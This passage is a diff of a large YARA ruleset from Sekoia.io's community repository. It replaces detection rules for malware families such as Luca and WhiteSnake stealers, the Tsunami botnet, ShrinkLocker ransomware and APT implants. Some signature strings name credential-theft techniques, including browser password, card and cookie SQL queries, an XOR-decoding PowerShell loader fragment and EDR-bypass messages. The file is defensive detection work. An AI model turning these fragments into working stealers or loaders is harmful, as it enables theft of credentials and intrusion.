+		logic_hash = "8cec5819dd7b01b3993acae056f5640fa28ffe76b05d2d9e59779a73eb00bd6e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "3065b8e4bb91b4229d1cea671e8959da8be2e7482067e1dd03519c882738045e"
-		hash2 = "d912f49d24792aa7197509f76e2097ac3858cde23199e1b40f2516948d39c589"
-		hash3 = "e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4"
-		hash4 = "fe156159a26f8b7c140db61dd8b136e1c8103a800748fe9b70a3a3fdf179d3c3"
 
 	strings:
-		$ = "AType: Text Document" wide
-		$ = "Size: 5.23 KB" wide
-		$ = "Date modified: 01/02/2020 11:23" wide
+		$ = "*rshell.exe" wide
+		$ = "/od') do call" wide
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x4c000000 and all of them
 }
-
-rule SEKOIA_Stealer_Win_Luca : FILE
+rule SEKOIA_Botnet_Lin_Tsunami : FILE
 {
 	meta:
-		description = "Detect Luca stealer. Open source Rust stealer."
+		description = "Catch tsunami botnet based on string"
 		author = "Sekoia.io"
-		id = "d2cc1442-0ba5-4e81-9fea-e9e078903eed"
-		date = "2022-07-26"
+		id = "65d2ff89-064f-489a-a215-33197926a62d"
+		date = "2024-09-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/stealer_win_luca.yar#L3-L49"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3694db49d84f92c70c51e4fe6f126fd56b3d7d8ed26619137fd55b0adb97865e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/botnet_lin_tsunami.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "536a28db011459d841652e25a852ccf2"
+		logic_hash = "8678ead4c863b2bc6bbb5e0023dee10f4e9f031bd0c8f515ad30d6145755ccaa"
 		score = 75
-		quality = 78
+		quality = 53
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "cookies"
-		$ = "creditcards"
-		$ = "/Default/Network/CookiesUser Data/Default/Network/Cookies_cookies"
-		$ = "/Default/Web DataUser Data/Default/Web Data_webdata"
-		$ = "SELECT action_url, username_value, password_value FROM loginsSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cardsSELECT host_key, name, encrypted_value, path, expires_utc, is_secure FROM cookiesLOCALAPPDATA"
-		$ = "\\logsxc\\passwords_.txt"
-		$ = " Name:"
-		$ = "User: "
-		$ = "Installed Languages:  "
-		$ = "Operating System: "
-		$ = "Used/Installed RAM:  GB "
-		$ = "Cores available: "
-		$ = "\\screen-.png"
-		$ = "Username: "
-		$ = "Computer name: "
-		$ = "OS: "
-		$ = "Language: "
-		$ = "Hostname: "
-		$ = "=> networks: B"
-		$ = "=> system:total memory:  KB"
-		$ = "used memory : "
-		$ = "total swap  : "
-		$ = "used swap   : "
-		$ = "NB CPUs: "
-		$ = "Passwords: "
-		$ = "Wallets: "
-		$ = "Files: "
-		$ = "Credit Cards: "
-		$ = "sensfiles.zip"
+		$n = "NOTICE %s" ascii
+		$t = "TSUNAMI" ascii nocase
+		$s1 = "NICK" ascii fullword
+		$s2 = "GETSPOOFS" ascii fullword
+		$s3 = "IRC" ascii fullword
+		$s4 = "PONG" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 4000KB and pe.rich_signature.toolid ( 0 , 0 ) and pe.number_of_resources == 0 and 15 of them
+		uint32( 0 ) == 0x464c457f and #n > 40 and #t > 3 and 3 of ( $s* )
 }
-rule SEKOIA_Koi_Powershell_Loading_Obfuscatednet
+rule SEKOIA_Bot_Win_Yamabot : FILE
 {
 	meta:
-		description = "Powershell script loading obfuscated .NET Koi module"
+		description = "Detect the Yamabot implant used by Lazarus"
 		author = "Sekoia.io"
-		id = "75a7460d-cc28-470e-9841-da8e46ee0101"
-		date = "2024-03-20"
+		id = "9f5b85c4-59e3-448f-b054-5b4932ee89bb"
+		date = "2023-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/koi_powershell_loading_obfuscatednet.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "82f30c04474ea77af5169771a2c0e75ba792fd32dc559b8c29172b73ace4ef10"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_win_yamabot.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cb183cbf9703d96b5f463d635885eab66e0d36c4763752a5cb934538ada60ec3"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f"
+		hash2 = "66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66"
+		hash3 = "74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643"
+		hash4 = "def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563"
 
 	strings:
-		$s1 = "# [Net.ServicePointManager]::SecurityProtocol +='tls12'"
-		$s2 = "$binary[$i] = $binary[$i] -bxor $k[$i % $k.Length]"
-		$s3 = "\").Split('|')"
-		$s4 = "$ep.Invoke($null, "
+		$s1 = "_/D_/Bot/YamaBot/"
+		$s2 = "Go build ID: \"ujRRNborth3MgXzS7HTu/aYhLszO8_95srnr8Fk1n/Xr8P792kGZ_VUqOQVc97/kgx_H7YuMZBl2Ajyac2M\""
 
 	condition:
-		$s3 and 3 of them
+		uint16be( 0 ) == 0x4d5a and 1 of them and filesize > 3MB
 }
-rule SEKOIA_Bumblebee_Loader : FILE
+rule SEKOIA_Implant_Mac_Rustbucket : FILE
 {
 	meta:
-		description = "Detect the BUMBLEBEE loader"
+		description = "Detect the RustBucket malware"
 		author = "Sekoia.io"
-		id = "8fd795c7-6896-498c-a892-de9da6427b60"
-		date = "2022-05-23"
+		id = "fcbb745d-7f56-4c51-9db5-427da22a0c68"
+		date = "2023-04-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bumblebee_loader.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "73c0195c51b5f8c36ab6d7a0e783f1229709d51fc42e2486c02fa65bbbdf955b"
+		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_mac_rustbucket.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747"
+		logic_hash = "ab7bc706b0d3f0dcd739ffe7f8153ba7377892143d8d53ce1591519ffe4ae84f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242333,95 +243122,77 @@ rule SEKOIA_Bumblebee_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = { 5a 00 3a 00 5c 00 68 00 6f 00 6f 00 6b 00 65 00 72 00 32 00 5c 00 43 00 6f 00 6d 00 6d 00 6f 00 6e 00 5c 00 6d 00 64 00 35 00 2e 00 63 00 70 00 70 00 }
-		$str1 = "/gate" ascii
-		$str2 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
-		$str3 = "BLACK" ascii
+		$ = "/Users/hero/"
+		$ = "PATHIpv6Ipv4Bodyslotpath"
+		$macho_magic = {CF FA ED FE}
+		$java_magic = {CA FE BA BE}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		($macho_magic at 0 or $java_magic at 0 ) and all of them
 }
-rule SEKOIA_Ransomware_Win_Shrinklocker
+rule SEKOIA_Infostealer_Win_Whitesnake_Xor_Rc4_July12 : FILE
 {
 	meta:
-		description = "Detects files related to the ShrinkLocker ransomware"
+		description = "Detects WhiteSnake Stealer XOR and RC4 version"
 		author = "Sekoia.io"
-		id = "93a6fbdd-ad62-456a-a1a5-b5ae3b242004"
-		date = "2024-06-07"
+		id = "f2ebfcbd-9667-459a-a543-ce0be62c0dc4"
+		date = "2023-07-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_shrinklocker.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7770b0946b9bb482f23c4ce0d753393e0d42a6fd8b31029847d74356296f0cf1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_whitesnake_xor_rc4_july12.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f14b95e5cb6ffaab14d0890847fe6e9dcfc3ee0b884c34d24d786420e2411a80"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 76
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a = "shrinkdisk" ascii fullword
-		$b = "BitLocker" ascii fullword
-		$c = "diskpart" ascii fullword
-		$d = "disk.vbs" ascii fullword
-		$e = "strDriveLetter" ascii fullword
-		$f = "shrinkcomplate" ascii fullword
-		$g = "ADODB.Stream" ascii fullword
-		$h = "Win32_OperatingSystem" ascii fullword
-		$i = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" ascii fullword
-		$j = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" ascii fullword
-		$k = "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" ascii fullword
+		$1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
+		$2 = {61 6e 61 6c 2e 6a 70 67}
+		$3 = {73 68 69 74 2e 6a 70 67}
+		$4 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
+		$5 = "qemu" wide
+		$6 = "vbox" wide
 
 	condition:
-		9 of them
+		($1 and $2 and filesize < 600KB ) or ( $3 and $4 and $5 and $6 and filesize < 300KB )
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Stealer_Feb23 : FILE
+
+rule SEKOIA_Backdoor_Win_Nukesped_Andariel
 {
 	meta:
-		description = "Finds WhiteSnake samples (stealer module)"
+		description = "Detect the NukeSped variant type 1 used by Andariel in October 2023"
 		author = "Sekoia.io"
-		id = "68ae7fbc-4486-4b60-af5e-f37ddc58f170"
-		date = "2023-03-01"
+		id = "a3601f0b-5782-4546-ac22-8a0514791f8f"
+		date = "2023-11-27"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_whitesnake_stealer_feb23.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "90007c38c644b79b2a60d9a252bd95071c5be57c649d73b66a73a1158cddc2fb"
+		reference = "https://asec.ahnlab.com/en/59073/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_nukesped_andariel.yar#L4-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d6421f3d0a3059e4104cfdceebb237269592f8ace7cc8d5bd613d239e4c010f4"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$fun01 = "Ibhiyptxjhiacrnxomvqjb" ascii
-		$fun02 = "Irwcvmgzsduiiizaabbczm" ascii
-		$whi = "WhiteSnake.Properties.Resources" ascii
-		$str01 = "get_UtcNow" ascii
-		$str02 = "get_IPAddress" ascii
-		$str03 = "get_Ticks" ascii
-		$str04 = "set_commands" ascii
-		$str05 = "set_Information" ascii
-		$str06 = "set_filedata" ascii
-		$str07 = "get_Jpeg" ascii
-		$str08 = "set_Culture" ascii
-		$str09 = "MakeScreenshot" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $fun* ) or $whi ) and 3 of ( $str* ) or 7 of ( $str* ) ) and filesize < 100KB
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "4ce43c7e358e3951f4c4ebd050d570786cbb473ee353974fc7414e3d753da9f6" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "355485cbe2bec406d60a48d7d8d25c71d9ded3c508c87273d936a92b94720d9b" )
 }
-rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
+rule SEKOIA_Apt_Apt35_Iisraid_Strings : FILE
 {
 	meta:
-		description = "Detects stealer used in 3CX campaign"
+		description = "Detects APT35s ISSRaid implant"
 		author = "Sekoia.io"
-		id = "1ca0605d-101f-4d1d-a476-9dfd93e74b4c"
-		date = "2023-03-31"
+		id = "ee42f406-0c7e-4385-9098-409611dbe0a5"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_3cx_payload_stealer.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "17630ab86a3da3408e29765c0c30f14c76b870b88fea634b998392fe5d46cfa2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt35_iisraid_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "de2ebef5ab46136aa54b146dbd4198f69801f3414d1d239fc7983c5b3c0115c4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242429,26 +243200,25 @@ rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "******************************** %s ******************************" wide
-		$s2 = "\\3CXDesktopApp\\config.json" wide
-		$s3 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\":" wide
-		$s4 = "%s.old" wide
+		$ = "CHttpModule::"
+		$ = "X-Forward-Verify"
+		$ = "X-Beserver-Verify"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Meduzastealer : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_1 : FILE
 {
 	meta:
-		description = "Finds MeduzaStealer samples based on specific strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "1276f485-aa5d-491b-89d8-77f98dc496e1"
-		date = "2023-06-20"
+		id = "82fd284a-47c2-4d29-9c80-f3affaa61a13"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_meduzastealer.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e81a5a9611662422eb7a87c0c1a370cee6f138fd6169225d969b669337d91a06"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_1.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "20e42042bd03bde3d0eec42f81d560896e8ec9e67ad64611dc4bc21152db3ff0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242456,33 +243226,26 @@ rule SEKOIA_Infostealer_Win_Meduzastealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "emoji" ascii
-		$str02 = "%d-%m-%Y, %H:%M:%S" ascii
-		$str03 = "[UTC" ascii
-		$str04 = "user_name" ascii
-		$str05 = "computer_name" ascii
-		$str06 = "timezone" ascii
-		$str07 = "current_path()" ascii
-		$str08 = "[json.exception." ascii
-		$str09 = "GDI32.dll" ascii
-		$str10 = "GdipGetImageEncoders" ascii
-		$str11 = "GetGeoInfoA" ascii
+		$ = "rc4 = function(key, str)"
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "var plain = rc4("
+		$ = "<script language="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them and filesize > 500KB
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
+rule SEKOIA_Apt_Unk_Batcopier_Strings : FILE
 {
 	meta:
-		description = "Detects timeCheck routine in LambLoad"
+		description = "Detects BatCopier variant"
 		author = "Sekoia.io"
-		id = "8807c752-c34e-4c3b-9194-3a9bd2575a88"
-		date = "2023-11-27"
+		id = "eb76bbd0-a722-4fec-a4a7-c48c70a1880b"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_lambload_timecheck.yar#L1-L67"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "019e559f3596cf83f7e7ada05f6550b50b2d45d577600fa549470b98af93e23b"
+		reference = "https://www.seqrite.com/blog/operation-oxidovy-sophisticated-malware-campaign-targets-czech-officials-using-nato-themed-decoys/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unk_batcopier_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0007d6d00d5b8db048456bb566ef9ed4516c4e1b392cc73c40396785ba885f55"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242490,49 +243253,25 @@ rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        0F 85 ?? ?? ?? ??
-        8D 85 ?? ?? ?? ??
-        50
-        E8 ?? ?? ?? ??
-        83 C4 ??
-        83 78 ?? ??
-        0F 85 ?? ?? ?? ??
-        8B 48 ??
-        83 F9 ??
-        0F 8C ?? ?? ?? ??
-        83 F9 ??
-        0F 8D ?? ?? ?? ??
-        8B 40 ??
-        83 F8 ??
-        0F 8C ?? ?? ?? ??
-        83 F8 ??
-        0F 8D ?? ?? ?? ??
-        53
-        57
-        68 ?? ?? ?? ??
-        8D 85 ?? ?? ?? ??
-        6A ??
-        50
-        C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-        }
+		$ = "@echo off"
+		$ = "echo F|xcopy"
+		$ = "attrib +r +s +h"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and any of them
+		all of them and filesize < 1KB
 }
-
-rule SEKOIA_Infostealer_Win_Eternity : FILE
+rule SEKOIA_Apt_Implant_Xdealer_Vbs_Launcher_Strings : FILE
 {
 	meta:
-		description = "Detect the Eternity infostealer based on specific strings"
+		description = "Detects XDealer VBS Launcher"
 		author = "Sekoia.io"
-		id = "0ed8d4bd-d57f-40a8-a709-d69531d59847"
-		date = "2022-03-23"
+		id = "ebfc8a33-70dc-44d5-bc4a-07afc56f8254"
+		date = "2024-03-22"
 		modified = "2024-12-19"
-		reference = "hxxp://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.]onion/threads/62331/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_eternity.yar#L3-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "06f0f7f51100278160f5bc4f588bb6a9d749be308f879bd5704666bf90764bf9"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_implant_xdealer_vbs_launcher_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e206189fd21ed7b3bf48a51d955df9055b7f7aa502b7fac52b274cc414adea0d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242540,59 +243279,51 @@ rule SEKOIA_Infostealer_Win_Eternity : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Sending info to Eternity.." wide
-		$str1 = "Debug mode, dont share this stealer anywhere." wide
-		$str2 = "\\Growtopia.exe" wide
-		$str3 = "Software\\Growtopia" wide
-		$str4 = "Corrupting Growtopia.." wide
-		$str5 = "Disabling Task Manager.." wide
-		$str6 = "Deleting previous file from startup and copying new one." wide
-		$str7 = "Hiding file in Startup folder.." wide
-		$str8 = "Initializing File watcher.." wide
-		$str9 = "Decoder: Failed to delete temp login. No problem, continuing.." wide
-		$str10 = "dcd.exe" wide
+		$s1 = "Dim objws"
+		$s2 = "Set objws="
+		$s3 = "objws.Run \"\"\"C:\\ProgramData\\"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter0" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter1" ) ) or 4 of ( $str* )
+		$s1 at 0 and all of them and filesize < 200
 }
-rule SEKOIA_Tool_Dynamicwrapper_Strings : FILE
+rule SEKOIA_Apt_Kimsuky_Sharpext_Devps1_Strings : FILE
 {
 	meta:
-		description = "Detects DynamicWrapperX"
+		description = "Detects strings of Dev.ps1"
 		author = "Sekoia.io"
-		id = "bbfad0a8-8b86-47c7-bf70-0a3f6859d64b"
-		date = "2023-12-01"
+		id = "f2ad32a4-bfca-40b2-964e-b8562538a6f2"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_dynamicwrapper_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fad5fec74dc3efdd7fc67ef1c6373957df4ee564f3fe6333b924b236ea7458d9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharpext_devps1_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "32e96440838bf63679b2a05ce4e6c226bed515ceb5180e3cf079206e21a0c0c5"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Software\\Classes\\DynamicWrapperX" ascii
-		$ = "DllRegisterServer" ascii
-		$ = "GoLink, GoAsm" ascii
+		$s1 = "keybd_Event(" ascii fullword
+		$s2 = "Sleep" ascii fullword
+		$s3 = "CreateDev" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
+		filesize < 10KB and #s1 == 6 and #s2 == 6 and $s3
 }
-rule SEKOIA_Tool_Sharpnbtscan_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Main : FILE
 {
 	meta:
-		description = "Detects SharpNBTScan based on strings"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "e9d28dcb-b4b1-4d66-b225-ed0925f307d9"
-		date = "2024-09-09"
+		id = "99983df5-89d6-4fac-81e6-16e5ab20bde3"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sharpnbtscan_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "adc19140e84c4aa3433b8ae4096355e384bbd106326ed56b54fb44a86fd9fbc6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_commonmagic_main.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9bcfd6e9e150399c7f11abc41205119ddf24ea0fef5816ed905cd9b1e9ec5c1e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242600,26 +243331,33 @@ rule SEKOIA_Tool_Sharpnbtscan_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[+]Udp client will stop in 10 s ..." ascii wide
-		$ = "[*]Stop udp client ..." ascii wide
-		$ = "[*]Start udp client ..." ascii wide
-		$ = "[+] ip range {0} - {1} " ascii wide
+		$ = "graph.microsoft.com" ascii wide
+		$ = "children?select=name,size" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
 
 	condition:
-		uint32be( 0 ) == 0x5A4D and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Tool_Edrsandblast_Strings : FILE
+rule SEKOIA_Downloader_Win_Cobianrat : FILE
 {
 	meta:
-		description = "Detects EDRSandblast strings"
+		description = "Detect CobianRAT downloader"
 		author = "Sekoia.io"
-		id = "7059b89c-80b5-4768-b3eb-02f173f628b0"
-		date = "2024-01-08"
+		id = "7a86c17f-bf4e-4465-9488-244b75fc36f1"
+		date = "2024-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_edrsandblast_strings.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8528c4c440734ba97b98b6e0857d95f38a91eaf9120ba2eacff292c864fb86a5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_cobianrat.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "7a70779d9d7de5e370fac0fa2d4ccd13"
+		hash = "2ce40599a4990680db3af5defcd5381a"
+		hash = "56515c48f82475e7bb6a26b027a459d7"
+		hash = "3450bece12bd8103d5e718a2661d0404"
+		hash = "132858739129d2b863dc547facbed7e9"
+		hash = "693bd96d162c54d7e9605580eaf54a6e"
+		hash = "d03a4988e22e6c7b2a03efa2bdb1502d"
+		hash = "ab8c68b907ec2ce316bf18f00938710c"
+		logic_hash = "6437a2d0854fb7bd9ddde8434e9a2b95cbb7ccc04381400db211f38a6a575e43"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242627,35 +243365,23 @@ rule SEKOIA_Tool_Edrsandblast_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] Cred Guard bypass failed: obtained invalid" wide
-		$ = "[!] Cred Guard bypass non fatal error:" wide
